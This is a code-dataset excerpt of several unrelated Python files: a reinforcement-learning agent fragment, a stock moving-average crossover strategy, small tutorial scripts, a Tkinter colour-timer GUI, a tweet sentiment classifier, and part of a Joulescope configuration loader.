compute borda_values for action_a (probability that action_a wins against any other action)\n for action_a in range(self.n_actions):\n # if action has not yet recorded any ordinal values, action has to be played (set borda_value to 1.0)\n if ordinal_value_sum_per_action[action_a] == 0:\n borda_scores.append(1.0)\n continue\n\n if actions_to_compare_count < 1:\n # set lower than 1.0 (borda_value for zero_actions is 1.0)\n borda_scores.append(0.5)\n else:\n # over all actions: sum up the probabilities that action_a wins against the given action\n winning_probability_a_sum = 0\n # compare action_a to all other actions\n for action_b in range(self.n_actions):\n if action_a == action_b:\n continue\n # not comparable if action_b has no ordinal_values\n if ordinal_value_sum_per_action[action_b] == 0:\n continue\n else:\n # probability that action_a wins against action_b\n winning_probability_a = 0\n # running ordinal probability that action_b is worse than current investigated ordinal\n worse_probability_b = 0\n for ordinal_count in range(self.n_ordinals):\n ordinal_probability_a = self.ordinal_values[obs, action_a, ordinal_count] \\\n / ordinal_value_sum_per_action[action_a]\n # ordinal_probability_b is also the tie probability\n ordinal_probability_b = (self.ordinal_values[obs, action_b, ordinal_count] /\n ordinal_value_sum_per_action[action_b])\n winning_probability_a += ordinal_probability_a * \\\n (worse_probability_b + ordinal_probability_b / 2.0)\n worse_probability_b += ordinal_probability_b\n winning_probability_a_sum += winning_probability_a\n # normalize summed up probabilities with number of actions that have been compared\n borda_scores.append(winning_probability_a_sum / actions_to_compare_count)\n return borda_scores\n\n def get_greedy_action(self, obs):\n return np.argmax(self.compute_borda_scores(obs))\n\n # Chooses action with epsilon greedy exploration policy\n def choose_action(self, obs, greedy):\n greedy_action = self.get_greedy_action(obs)\n # choose random action with probability epsilon\n if not greedy and random.random() < self.epsilon:\n return random.randrange(self.n_actions)\n # greedy action is chosen with probability (1 - epsilon)\n else:\n return greedy_action\n\n def end_episode(self, n_episodes):\n # gradually reduce epsilon after every done episode\n self.epsilon = self.epsilon - 2 / n_episodes if self.epsilon > self.epsilon_min else self.epsilon_min\n\n def preprocess_observation(self, obs):\n discrete_observation = []\n for obs_idx in range(len(obs)):\n discrete_observation.append(int(np.digitize(obs[obs_idx], self.observation_space[obs_idx])))\n return self.observation_to_index[tuple(discrete_observation)]\n\n # Mapping of reward value to ordinal reward (has to be configured per game)\n def reward_to_ordinal(self, reward, episode_reward, done):\n if done and not self.check_win_condition(reward, episode_reward, done):\n return 0\n else:\n return 1\n\n # Returns Boolean, whether the win-condition of the environment has been met\n @staticmethod\n def check_win_condition(reward, episode_reward, done):\n if done and episode_reward == 200:\n return True\n else:\n return False\n\n def evaluate(self, i_episode, episode_rewards, episode_wins):\n # compute average episode reward and win rate over last episodes\n average_reward = round(sum(episode_rewards) / len(episode_rewards), 2)\n win_rate = round(sum(episode_wins) / len(episode_wins), 2)\n # store average episode reward and win rate over last episodes for plotting purposes\n self.average_rewards.append(average_reward)\n self.win_rates.append(win_rate)\n print(\"{}\\t{}\\t{}\".format(i_episode + 1, average_reward, win_rate))\n\n # Plots win rate and average score over all episodes\n def plot(self, n_episodes, step_size):\n # plot win rate\n plt.figure()\n plt.plot(list(range(step_size, n_episodes + step_size, step_size)), self.win_rates)\n plt.xlabel('Number of episodes')\n plt.ylabel('Win rate')\n\n # plot average score\n plt.figure()\n plt.plot(list(range(step_size, n_episodes + step_size, step_size)), self.average_rewards)\n plt.xlabel('Number of episodes')\n plt.ylabel('Average score')\n\n plt.show()\n","sub_path":"q_learning/ordinal_q_discretized_agent.py","file_name":"ordinal_q_discretized_agent.py","file_ext":"py","file_size_in_byte":8479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"415395040","text":"# -*- coding: utf-8 -*-\nfrom pyalgotrade.technical import ma\nfrom pyalgotrade.technical import cross\nimport sys,os\nimport pandas as pd\nimport time as time\nimport datetime as dt\n\nxpower = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'Ea_00_BaseClass'))\nsys.path.append(xpower)\nfrom midBaseStrategy import midBaseStrategy as midBaseStrategy\n\n#mid graphic result output\nfrom Analyzer import Analyzer\n\n#mid money\ndataRoot = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir)) \nsys.path.append(dataRoot)\nimport Ea_02_money.moneyFixedAmount as moneyFixedAmount\nimport Ea_02_money.moneyFixedRatio as moneyFixedRatio\nimport Ea_02_money.moneyFirst as moneyFirst\nimport Ea_02_money.moneySecond as moneySecond\n \nclass DMACrossOver(midBaseStrategy):\n def __init__(self): \n self.__initDataCenter()\n self.__initEa()\n def __initEa(self):\n #mid 1)signal 控制参数\n self.InKLine = True\n self.longAllowed = True\n self.shortAllowed = True \n self.__shortPeriod = 5\n self.__longPeriod = 20 \n #mid 2)signal 计算指标图形化输出控制\n #self.toPlot = True \n self.analyzer = Analyzer(Globals=[]) \n #mid 3)money 风险策略控制\n money = \"moneyFixedRatio\"\n if(money == \"moneySecond\"):\n self.money = moneySecond.moneySecond() \n elif(money == \"moneyFixedAmount\"):\n self.money = moneyFixedAmount.moneyFixedAmount() \n elif(money == \"moneyFixedRatio\"):\n self.money = moneyFixedRatio.moneyFixedRatio() \n def __getInstrumentsEastmoneyFormat(self):\n codesStr = \"\"\"600000.SH\n 600010.SH\n 600016.SH\n 600028.SH\n 600029.SH\n 600030.SH\n 600036.SH\n 600048.SH\n 600050.SH\n 600104.SH\n 600109.SH\n 600111.SH\n 600518.SH\n 600519.SH\n 600637.SH\n 600795.SH\n 600837.SH\n 600887.SH\n 600893.SH\n 600958.SH\n 600999.SH\n 601006.SH\n 601088.SH\n 601166.SH\n 601169.SH\n 601186.SH\n 601211.SH\n 601288.SH\n 601318.SH\n 601328.SH\n 601336.SH\n 601377.SH\n 601390.SH\n 601398.SH\n 601601.SH\n 601628.SH\n 601668.SH\n 601669.SH\n 601688.SH\n 601727.SH\n 601766.SH\n 601788.SH\n 601800.SH\n 601818.SH\n 601857.SH\n 601919.SH\n 601985.SH\n 601988.SH\n 601989.SH\n 601998.SH\n \"\"\" \n return codesStr\n def __getInstrumentsTushare(self):\n #mid 1)从excel赋值粘贴获得如下数据\n codesStr = self.__getInstrumentsEastmoneyFormat()\n #mid 2)将字符串使用split()分割为list,默认会去除\\n和所有空格。\n #codeList = ['000021','000022']\n codeList = [code.split('.')[0] for code in codesStr.split()] \n return codeList \n def __getInstrumentsEastmoney(self):\n codesStr = self.__getInstrumentsEastmoneyFormat()\n #mid 2)将字符串使用split()分割为list,默认会去除\\n和所有空格。\n #codeList = ['000021.SZ','000022.SZ']\n codeList = codesStr.split()\n return codeList\n def __getBenchSymbol(self):\n return \"510050.SH\"\n def __getBenchDataProvider(self):\n return \"eastmoney\"\n def __getInstruments(self,dataSource):\n if(dataSource == \"tushare\"):\n instruments = self.__getInstrumentsTushare()\n if(dataSource == \"eastmoney\"):\n instruments = self.__getInstrumentsEastmoney()\n return instruments[0:1] \n def __initDataCenter(self):\n #mid 数据中心存取参数定义,决定当前被回测数据的储存属性,用于获取candledata,feeds \n self.period = 'D'\n self.benchSymbol = self.__getBenchSymbol()\n self.benchDataProvider = self.__getBenchDataProvider()\n selector = \"three\"\n if(selector == \"one\"):\n self.dataProvider = 'tushare'\n self.storageType = 'mongodb'\n self.instruments = ['000096','000099','600839','600449']#,'600839'] \n if(selector == \"tow\"):\n self.dataProvider = 'tushare'\n self.storageType = 'mongodb' \n #self.instruments = ['XAUUSD','EURUSD'] \n self.instruments = self.__getInstruments(self.dataProvider)\n if(selector == \"three\"):\n self.dataProvider = 'eastmoney'\n self.storageType = 'mongodb' \n #self.instruments = ['000021.SZ','000022.SZ'] #]\n self.instruments = self.__getInstruments(self.dataProvider) \n if(selector == \"four\"):\n self.dataProvider = 'mt5'\n self.storageType = 'mongodb' \n #self.instruments = ['XAUUSD','EURUSD'] \n self.instruments = ['XAGUSD','XAUUSD'] \n def initIndicators(self):\n #mid 3)\n self.__sma = {}\n self.__lma = {} \n for instrument in self.instruments:\n self.__sma[instrument] = ma.SMA(self.closePrices[instrument], self.__shortPeriod,maxLen=self.mid_DEFAULT_MAX_LEN)\n self.__lma[instrument] = ma.SMA(self.closePrices[instrument],self.__longPeriod,maxLen=self.mid_DEFAULT_MAX_LEN)\n def addIndicators(self,instrument):\n #mid 此处生成的数据仅由Analyzer消费\n short_ema = pd.DataFrame(data=list(self.__sma[instrument]),index=self.__sma[instrument].getDateTimes(),columns = ['short_ema'])\n long_ema = pd.DataFrame(data=list(self.__lma[instrument]),index=self.__lma[instrument].getDateTimes(),columns = ['long_ema'])\n \n self.results[instrument] = self.results[instrument].join(short_ema)\n self.results[instrument] = self.results[instrument].join(long_ema)\n #self.results[instrument]['short_ema'] = e['short_ema']\n #self.results[instrument]['long_ema'] = list(self.__lma[instrument])\n def calcSignal(self):\n self.buySignal,self.sellSignal = {},{}\n for instrument in self.instruments:\n self.buySignal[instrument],self.sellSignal[instrument] = False,False\n #if(self.longAllowed):\n if self.longPosition[instrument] is None:\n #mid 无多仓,检查是否需要开多仓\n if cross.cross_above(self.__sma[instrument], self.__lma[instrument]) > 0:\n self.buySignal[instrument] = True \n #if(self.shortAllowed ):\n if self.shortPosition[instrument] is None:\n if cross.cross_below(self.__sma[instrument], self.__lma[instrument]) > 0:\n self.sellSignal[instrument] = True \n def onBars(self, bars): \n time = self.getCurrentDateTime()\n if(time == dt.datetime(2001,11,8,0,0)):\n pass \n self.calcSignal()\n self.closePosition()\n self.openPosition()\n self.recordAccount() ","sub_path":"upsea/Ea_11_Dma_pg_01/EA/Signal.py","file_name":"Signal.py","file_ext":"py","file_size_in_byte":7451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"573859899","text":"# 1. return a function\ndef func1():\n def func2(x):\n return x + 1\n\n return func2\n\n\nnew_func = func1()\nfunc1()(1)\nnew_func(1)\n\n\ndef func1(x):\n def func2(x1):\n return x\n\n return func2\n\n\nprint(\"--------\")\nprint(func1(10)(20))\n\n\ndef func3(x):\n return x\n\n\ndef builder(name):\n if callable(name):\n return name\n else:\n print(\"wrong\")\n\n\n# print(builder(func3))\n\ndef sf01(a):\n return a + 1\n\n\nx = 1\ny = 2\nz = 3\nout = [*map(sf01, (x, y, z))]\nprint(out)\nx = []\nx.append([1, 2, 3])\nx.append([2, 3, 4])\nimport numpy as np\n\ny = np.concatenate(x)\nprint(y)\n\n\ndef myFun1(**kwargs):\n print(kwargs)\n for key, value in kwargs.items():\n print(\"%s == %s\" % (key, value))\n\n\nmyFun1(first='Geeks', mid='for', last='Geeks')\n\n\ndef myFun(arg1, arg2, arg3):\n print(\"arg1:\", arg1)\n print(\"arg2:\", arg2)\n print(\"arg3:\", arg3)\n\n\ndef myFun2(*arg):\n print(arg)\n\n\n# Now we can use *args or **kwargs to\n# pass arguments to this function :\nargs = (\"Geeks\", \"for\", \"Geeks\")\nmyFun(*args)\nkwargs = {\"arg1\": 2, \"arg2\": 3, \"arg3\": 4}\nmyFun1(**kwargs)\n\ntest_keys = [\"Rash\", \"Kil\", \"Varsha\"]\ntest_values = [1, 4, 5]\nres = dict(zip(test_keys, test_values))\nmyFun2(test_keys)\n\nprint(res)\n","sub_path":"src/basics/advanced_functions.py","file_name":"advanced_functions.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"602628851","text":"TARIFF_11 = 0.244618\r\nTARIFF_31 = 0.136928\r\n\r\nprint(\"Electricity bill estimator, by Luke\")\r\n\r\nkwh_price = int(input(\"Enter cents per kWh:\"))\r\ndaily_kwh = float(input(\"Enter daily use in kWh:\"))\r\nbilling_days = int(input(\"Enter number of billing days:\"))\r\nestimate_bill = kwh_price * daily_kwh * billing_days / 100\r\n\r\nprint(\"Estimated bill: $\", estimate_bill)","sub_path":"Elec bill estimate.py","file_name":"Elec bill estimate.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"366905837","text":"import random\nfrom time import sleep\nfrom tkinter import *\n\ncheck = {\n \"blue\": True,\n \"red\": True,\n \"yellow\": True,\n \"green\": True,\n \"black\": False,\n \"pink\": False\n}\n\ncolors = {\n \"blue\": \"0000ff\",\n \"red\": \"ff0000\",\n \"yellow\": \"00ffff\",\n \"green\": \"00ff00\",\n \"black\": \"000000\",\n \"pink\": \"f0f0f0\"\n}\n\nclr = [\"blue\", \"red\", \"yellow\", \"green\", \"black\", \"pink\"]\n\ninterval = 3.0 # amount of time until next color\ntimer = 60 # total amount of time\npause = 0.2 # pause between color switch\namount_of_colors = 4\n\nfor color in check:\n if not check.get(color):\n colors.pop(color)\n\nfor color in colors:\n print(color)\n\nprint(\"sequence\")\n\n\ndef reset():\n global colors\n global amount_of_colors\n colors = {\n \"blue\": \"0000ff\",\n \"red\": \"ff0000\",\n \"yellow\": \"00ffff\",\n \"green\": \"00ff00\",\n \"black\": \"000000\",\n \"pink\": \"f0f0f0\"\n }\n amount_of_colors = 6\n\n\ndef set_labels():\n print(interval)\n labelFreq.set(interval)\n labelTime.set(timer/60)\n labelColors.set(amount_of_colors)\n\n\ndef colorize():\n clr = random.choice(list(colors.keys()))\n print(clr)\n fill(clr)\n\n\ndef fill(bg_color):\n colour.set(bg_color)\n print\n colour.get()\n bottomFrame.configure(bg=colour.get())\n root.update()\n\n\ndef looper():\n loop = int(timer / interval)\n for i in range(loop):\n colorize()\n sleep(interval - pause)\n fill(\"gray\")\n sleep(pause)\n\n\ndef confirm():\n reset()\n\n global interval\n global timer\n global amount_of_colors\n interval = float(sliderFreq.get())\n timer = int(60 * sliderTime.get())\n\n for ctr, int_var in enumerate(cb_intvar):\n color = clr[ctr]\n if int_var.get() == 0:\n colors.pop(color)\n amount_of_colors -= 1\n\n if len(colors) == 0:\n reset()\n\n set_labels()\n\n\n# GUI ------------------------------------------------------------------------------------------------------------------\nroot = Tk()\n\ncolour = StringVar()\ncolour.set(\"gray\")\n\ntopFrame = Frame(root)\ntopFrame.pack(fill=\"x\")\n\ntopLeft = Frame(topFrame)\ntopLeft.pack(side=\"left\", fill=\"y\")\ntopCenter = Frame(topFrame)\ntopCenter.pack(side=\"left\", fill=\"y\")\ntopRight = Frame(topFrame)\ntopRight.pack(side=\"bottom\", anchor=\"e\", fill=\"y\")\n\nsliderFreq = Scale(topLeft, from_=0.5, to=5, orient=HORIZONTAL, length=300, resolution=0.1, label=\"Interval in seconds\")\nsliderFreq.set(interval)\nsliderFreq.pack(padx=20, pady=5)\n\nsliderTime = Scale(topLeft, from_=0.1, to=10, orient=HORIZONTAL, length=300, resolution=0.1, label=\"Time in minutes\")\nsliderTime.set(timer/60)\nsliderTime.pack(padx=20, pady=5)\n\ntBtn = Button(topLeft, text=\"Confirm settings\", command=confirm)\ntBtn.pack(fill=\"x\", padx=20, pady=10)\n\ni = 0\ncb_intvar = []\nfor color in check:\n cb_intvar.append(IntVar())\n colorButton = Checkbutton(topCenter, text=color, variable=cb_intvar[-1])\n if check.get(color):\n colorButton.select()\n colorButton.grid(row=int(i/2), column=i % 2, padx=30, pady=15, sticky=W)\n i += 1\n\n\nLabel(topRight, text=\"Interval (s):\").grid(row=0, column=0, sticky=W, padx=20, pady=10)\nlabelFreq = StringVar()\nLabel(topRight, textvariable=labelFreq).grid(row=0, column=1, padx=20, pady=10)\n\nLabel(topRight, text=\"Time (min):\").grid(row=1, column=0, sticky=W, padx=20, pady=10)\nlabelTime = StringVar()\nLabel(topRight, textvariable=labelTime).grid(row=1, column=1, padx=20, pady=10)\n\nLabel(topRight, text=\"# Colors:\").grid(row=2, column=0, sticky=W, padx=20, pady=10)\nlabelColors = StringVar()\nLabel(topRight, textvariable=labelColors).grid(row=2, column=1, padx=20, pady=10)\n\nset_labels()\n\n\nbtn = Button(topRight, text=\"Start exercise\", command=looper).grid(row=3, padx=20, pady=10, columnspan=2, sticky=N+S+E+W)\n\n\nbottomFrame = Frame(root, bg=colour.get(), height=400, width=800)\nbottomFrame.pack(side=BOTTOM, fill=\"both\", expand=1)\n\nroot.mainloop()\n","sub_path":"basicGui.py","file_name":"basicGui.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"432850511","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.pipeline import Pipeline\nimport numpy as np\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.metrics import f1_score\nfrom sklearn import linear_model\nimport re\nimport string\nfrom sklearn.model_selection import train_test_split\nimport csv\nimport matplotlib.pyplot as plt\n\n# import tweets with positive or negative labels\nwith open('two_point_tweet.tsv') as tsv:\n reader = csv.reader(tsv,delimiter=\"\\t\")\n data = list(reader)\n\ndata = np.array(data)\n\n# pattern for repeated character in a word\nreplacement_patterns = [\n (r'won\\'t', 'will not'),\n (r'can\\'t', 'cannot'),\n (r'i\\'m', 'i am'),\n (r'ain\\'t', 'is not'),\n (r'(\\w+)\\'ll', '\\g<1> will'),\n (r'(\\w+)n\\'t', '\\g<1> not'),\n (r'(\\w+)\\'ve', '\\g<1> have'),\n (r'(\\w+)\\'s', '\\g<1> is'),\n (r'(\\w+)\\'re', '\\g<1> are'),\n (r'(\\w+)\\'d', '\\g<1> would')\n]\n\n# Replace abbreviation\ndef replaceShort(s):\n for (pattern,repl) in replacement_patterns:\n s = re.sub(pattern,repl,s)\n return s\n\n# Replace character reprition\ndef replaceRep(s):\n repl_word = re.sub(r'(\\w*)(\\w)\\2(\\w*)',r'\\1\\2\\3',s)\n if repl_word != s:\n return replaceRep(repl_word)\n else:\n return repl_word\n\n# Convert positive to 1, negative to 0\ndef classToNum(s):\n if s == 'negative':\n return 0\n elif s == 'positive':\n return 1\n\n# Data preprocessing\n# Extract labels and tweets\ndata = data[:,2:]\n# Convert tweets to lower class\ndata[:,1] = [x.lower() for x in data[:,1]]\n# Delete 'not available' tweets\ndata = np.array([x for x in data if x[1] != 'not available'])\n# Delete '#' in a tweet\ndata[:,1] = [re.sub('#','',x) for x in data[:,1]]\n# Delete '@' in a tweet\ndata[:,1] = [re.sub('@','',x) for x in data[:,1]]\n# Delete URL address\ndata[:,1] = [re.sub(' http.*\\w','',x) for x in data[:,1]]\ndata[:,1] = [re.sub(' http.*\\d','',x) for x in data[:,1]]\n# Convert abbreviation for number to proper English\ndata[:,1] = [re.sub('1st','first',x) for x in data[:,1]]\ndata[:,1] = [re.sub('2nd','second',x) for x in data[:,1]]\ndata[:,1] = [re.sub('3rd','third',x) for x in data[:,1]]\ndata[:,1] = [re.sub('4th','fourth',x) for x in data[:,1]]\ndata[:,1] = [re.sub('5th','fifth',x) for x in data[:,1]]\ndata[:,1] = [re.sub('6th','sixth',x) for x in data[:,1]]\ndata[:,1] = [re.sub('7th','seventh',x) for x in data[:,1]]\ndata[:,1] = [re.sub('8th','eighth',x) for x in data[:,1]]\ndata[:,1] = [re.sub('9th','nineth',x) for x in data[:,1]]\n# Delete all numbers\ndata[:,1] = [re.sub('\\d','',x) for x in data[:,1]]\n# Delete all punctuation\ndata[:,1] = [''.join(c for c in x if c not in string.punctuation) for x in data[:,1]]\n# Replace abbreviation\ndata[:,1] = [replaceShort(x) for x in data[:,1]]\n# Replace character repetition with proper English\ndata[:,1] = [replaceRep(x) for x in data[:,1]]\n# Delete excessive whitespace\ndata[:,1] = [re.sub('\\s+',' ',x) for x in data[:,1]]\n\n# Categories of tweets\ncategories = ['negative','positive']\n# Convert labels of tweets to number\ndata[:,0] = [classToNum(x) for x in data[:,0]]\n# Declare lists of accuracies and F-score for different classification method and size of training set\naccuracy_NB = []\naccuracy_SVM = []\naccuracy_Mul = []\naccuracy_ensem1 = []\naccuracy_ensem2 = []\nF_score_NB = []\nF_score_SVM = []\nF_score_Mul = []\nF_score_ensem1 = []\nF_score_ensem2 = []\nholder = data\n\n# Print out classification accuracy and F-score\ndef printScore(predicted,y_test,s):\n print(s)\n print('prediction accuracy:', np.mean(predicted == y_test))\n print('F-score:', f1_score(y_test,predicted))\n\n# Loop from 10% to 100% training set size, append the result in respective list\nfor j in range(1,11):\n # X holds tweets, y holds labels\n X = data[:,1]\n y = data[:,0]\n y = [int(s) for s in y]\n \n # Split train, test set\n X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.33,random_state=45)\n X_train = X_train[:int(len(X_train)*j/10)]\n y_train = y_train[:int(len(y_train)*j/10)]\n \n # Naive Bayes\n text_clf = Pipeline([('vect', CountVectorizer()),('tfidf', TfidfTransformer()),('clf', MultinomialNB()),])\n text_clf = text_clf.fit(X_train, y_train)\n docs_test = X_test\n predicted_NB = text_clf.predict(docs_test)\n accuracy_NB.append(np.mean(predicted_NB == y_test))\n F_score_NB.append(f1_score(y_test,predicted_NB))\n \n # Support Vector Machine\n text_clf = Pipeline([('vect', CountVectorizer()),('tfidf', TfidfTransformer()),('clf', SGDClassifier(loss='hinge', penalty='l2',alpha=1e-3, n_iter=30, random_state=42)),])\n text_clf = text_clf.fit(X_train, y_train)\n predicted_SVM = text_clf.predict(docs_test)\n accuracy_SVM.append(np.mean(predicted_SVM == y_test))\n F_score_SVM.append(f1_score(y_test,predicted_SVM))\n \n # Multinomial Logistic Regression\n text_clf = Pipeline([('vect', CountVectorizer()),('tfidf', TfidfTransformer()),('clf', linear_model.LogisticRegression()),])\n text_clf = text_clf.fit(X_train, y_train)\n predicted_Mul = text_clf.predict(docs_test)\n accuracy_Mul.append(np.mean(predicted_Mul == y_test))\n F_score_Mul.append(f1_score(y_test,predicted_Mul))\n \n # Ensemble 1\n # Predict positive only if NB, SVM and Multinomial predicts positive\n predicted_ensem1 = []\n for i in range(len(predicted_NB)):\n if predicted_NB[i] == 1 and predicted_SVM[i] == 1 and predicted_Mul[i] ==1:\n predicted_ensem1.append(1)\n else:\n predicted_ensem1.append(0)\n predicted_ensem1 = np.array(predicted_ensem1)\n accuracy_ensem1.append(np.mean(predicted_ensem1 == y_test))\n F_score_ensem1.append(f1_score(y_test,predicted_ensem1))\n \n # Ensemble 2\n # Predict positive if any of NB, SVM and Multinomial predicts positive\n predicted_ensem2 = []\n for i in range(len(predicted_NB)):\n if predicted_NB[i] == 1 or predicted_SVM[i] == 1 or predicted_Mul[i] == 1:\n predicted_ensem2.append(1)\n else:\n predicted_ensem2.append(0)\n predicted_ensem2 = np.array(predicted_ensem2)\n accuracy_ensem2.append(np.mean(predicted_ensem2 == y_test))\n F_score_ensem2.append(f1_score(y_test,predicted_ensem2))\n\n# Plot classification accuracy\nplt.plot(accuracy_NB,marker='o',label='NB')\nplt.plot(accuracy_SVM,marker='o',label='SVM')\nplt.plot(accuracy_Mul,marker='o',label='Multi')\nplt.plot(accuracy_ensem1,marker='o',label='Ensem1')\nplt.plot(accuracy_ensem2,marker='o',label='Ensem2')\nplt.ylabel('Classification Accuracy')\nplt.xlabel('Percentage of Training Size')\nplt.title('Classification Accuracy vs. Training Set Size')\nplt.legend()\naxes = plt.gca()\naxes.set_ylim([0.8,0.90])\nplt.show()\nplt.close()\n\n# Plot F-score\nplt.plot(F_score_NB,marker='o',label='NB')\nplt.plot(F_score_SVM,marker='o',label='SVM')\nplt.plot(F_score_Mul,marker='o',label='Multi')\nplt.plot(F_score_ensem1,marker='o',label='Ensem1')\nplt.plot(F_score_ensem2,marker='o',label='Ensem2')\nplt.ylabel('F-sore')\nplt.xlabel('Percentage of Training Size')\nplt.title('F-score vs. Training Set Size')\nplt.legend()\naxes = plt.gca()\naxes.set_ylim([0.90,0.95])\nplt.show()\n","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"291248437","text":"# Copyright 2018 Jetperch LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Manage Joulescope application configurations\"\"\"\n\nimport json5\nimport os\nimport pkgutil\nimport collections\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\ntry:\n from win32com.shell import shell, shellcon\n USER_PATH = shell.SHGetFolderPath(0, shellcon.CSIDL_PERSONAL, None, 0)\n APPDATA_PATH = shell.SHGetFolderPath(0, shellcon.CSIDL_LOCAL_APPDATA, None, 0)\n APP_PATH = os.path.join(APPDATA_PATH, 'joulescope')\nexcept:\n USER_PATH = os.path.expanduser('~')\n APP_PATH = os.path.join(USER_PATH, '.joulescope')\n\nSAVE_PATH_DEFAULT = os.path.join(USER_PATH, 'joulescope')\nCONFIG_PATH = os.path.join(APP_PATH, 'config.json5')\n\n\nif not os.path.isdir(APP_PATH):\n os.makedirs(APP_PATH)\n\n\ndef _substitute(entry, value):\n if entry.get('type') == 'path':\n attributes = entry.get('attributes', [])\n if value == '__SAVE_PATH__':\n value = SAVE_PATH_DEFAULT\n if 'exists' in attributes and not os.path.exists(value):\n os.makedirs(value)\n elif 'exists' in attributes and not os.path.exists(value):\n raise ValueError('path does not exist: %s' % (value, ))\n return value\n\n\ndef validate(config_def, cfg, path=None, default_on_error=None):\n \"\"\"Validate that the configuration is valid.\n\n :param config_def: The configuration definition data structure.\n See config_def.json5 for the data structure format.\n :param cfg: The configuration to validate against the config_def.\n :param path: The path used recursively by this function.\n This value should not be provided by the initial caller.\n :param default_on_error: When true, presume the default value on\n validation errors.\n :return: True on validate success, False on failure.\n \"\"\"\n path = '' if path is None else str(path)\n if 'info' in config_def: # handle top level\n config_def = config_def['children']\n y = {}\n k2 = list(cfg.keys())\n for entry in config_def: # list of entry dicts\n t = entry.get('type', 'str')\n key = entry['name']\n p = path + '.' + key\n if t == 'map':\n if key in cfg:\n v = cfg[key]\n if isinstance(v, collections.abc.Mapping):\n y[key] = validate(entry['children'], v, default_on_error=default_on_error)\n else:\n raise ValueError('%s should be map' % (p, ))\n else:\n y[key] = validate(entry['children'], {}, default_on_error=default_on_error)\n else:\n v = cfg.get(key, entry.get('default'))\n if v is not None:\n if t == 'str' and 'options' in entry:\n values = {}\n for x in entry['options']:\n n = x['name']\n for e in [n] + x.get('aliases', []):\n if e in values:\n raise ValueError('Invalid configuration: duplicate key %s' % (e, ))\n values[e] = n\n if v not in values:\n if bool(default_on_error):\n d = entry.get('default')\n log.warning('%s: Value \"%s\" invalid, use default \"%s\"', p, v, d)\n v = d\n else:\n raise ValueError('%s: Value \"%s\" not in %s' % (p, v, values))\n v = values[v]\n y[key] = _substitute(entry, v)\n if key in k2:\n k2.remove(key)\n for k in k2:\n p = path + '.' + k\n log.info('Unexpected entry: %s', p)\n return y\n\n\ndef find_child_by_name(d, name):\n \"\"\"Find a specification configuration definition child.\n\n :param d: The configuration definition list with dict elements that\n have a key 'name'.\n :param name: The name to match against the 'name' key in each list\n element.\n :return: The matching element or None.\n\n Fastest implementation, no.\n Simplest while maintaining guaranteed order, yes.\n \"\"\"\n for entry in d['children']:\n if entry['name'] == name:\n return entry\n return None\n\n\ndef _cfg_def_normalize(d):\n child_map = {}\n for entry in d:\n if 'name' not in entry:\n raise ValueError('entry missing name')\n name = entry['name']\n if name in child_map:\n raise ValueError('duplicate name')\n child_map[name] = entry\n t = entry.get('type', 'str')\n entry['type'] = t # ensure all entries have type\n if t == 'str' and 'options' in entry:\n values = []\n for v in entry['options']:\n if isinstance(v, collections.abc.Mapping):\n values.append(v)\n else:\n x = {\n 'name': v,\n 'brief': '',\n }\n values.append(x)\n entry['options'] = values\n elif t == 'map':\n entry['children'] = _cfg_def_normalize(entry['children'])\n return d\n\n\ndef load_config_def(path: str=None):\n \"\"\"Load a configuration definition.\n\n :param path: The full path to the configuration definition.\n None (default) uses the config_def.json5 included with this\n package.\n :return: The configuration definition.\n See config_def.json5 for the data structure format.\n \"\"\"\n if path is None:\n bin_file = pkgutil.get_data('joulescope_ui', 'config_def.json5')\n d = json5.loads(bin_file, encoding='utf-8')\n elif not os.path.isfile(path):\n raise ValueError('config_def does not exist: %s' % (path, ))\n else:\n log.info('load_config_def %s', path)\n with open(path, 'r') as f:\n d = json5.load(f)\n # todo: validate the validator?\n d['children'] = _cfg_def_normalize(d['children'])\n return d\n\n\ndef load_config(config_def, path=None, default_on_error=None):\n \"\"\"Load the configuration.\n\n :param config_def: The configuration definition used to validate the\n loaded configuration.\n See config_def.json5 for the data structure format.\n :param path: The full path to the configuration definition.\n None (default) uses the platform-dependent path.\n :param default_on_error: When true, presume the default value on\n validation errors.\n :return: The loaded configuration which consists of a two level dictionary\n that mirrors the configuration definition. (key -> key -> value).\n \"\"\"\n if path is None:\n path = CONFIG_PATH\n if not isinstance(path, str):\n cfg = json5.load(path)\n elif not os.path.isfile(path):\n log.info('Configuration file not found: %s', path)\n cfg = {}\n else:\n log.info('Load configuration file: %s', path)\n with open(path, 'r') as f:\n cfg = json5.load(f)\n y = validate(config_def, cfg, default_on_error=default_on_error)\n return y\n\n\ndef save_config(cfg, path=None):\n \"\"\"Save the configuration.\n\n :param cfg: The configuration which consists of a two level dictionary\n that mirrors the configuration definition. (key -> key -> value).\n :param path: The full save path.\n None (default) uses the platform-dependent path.\n \"\"\"\n if path is None:\n path = CONFIG_PATH\n if not isinstance(path, str):\n json5.dump(cfg, path, indent=2)\n else:\n with open(path, 'w') as f:\n json5.dump(cfg, f, 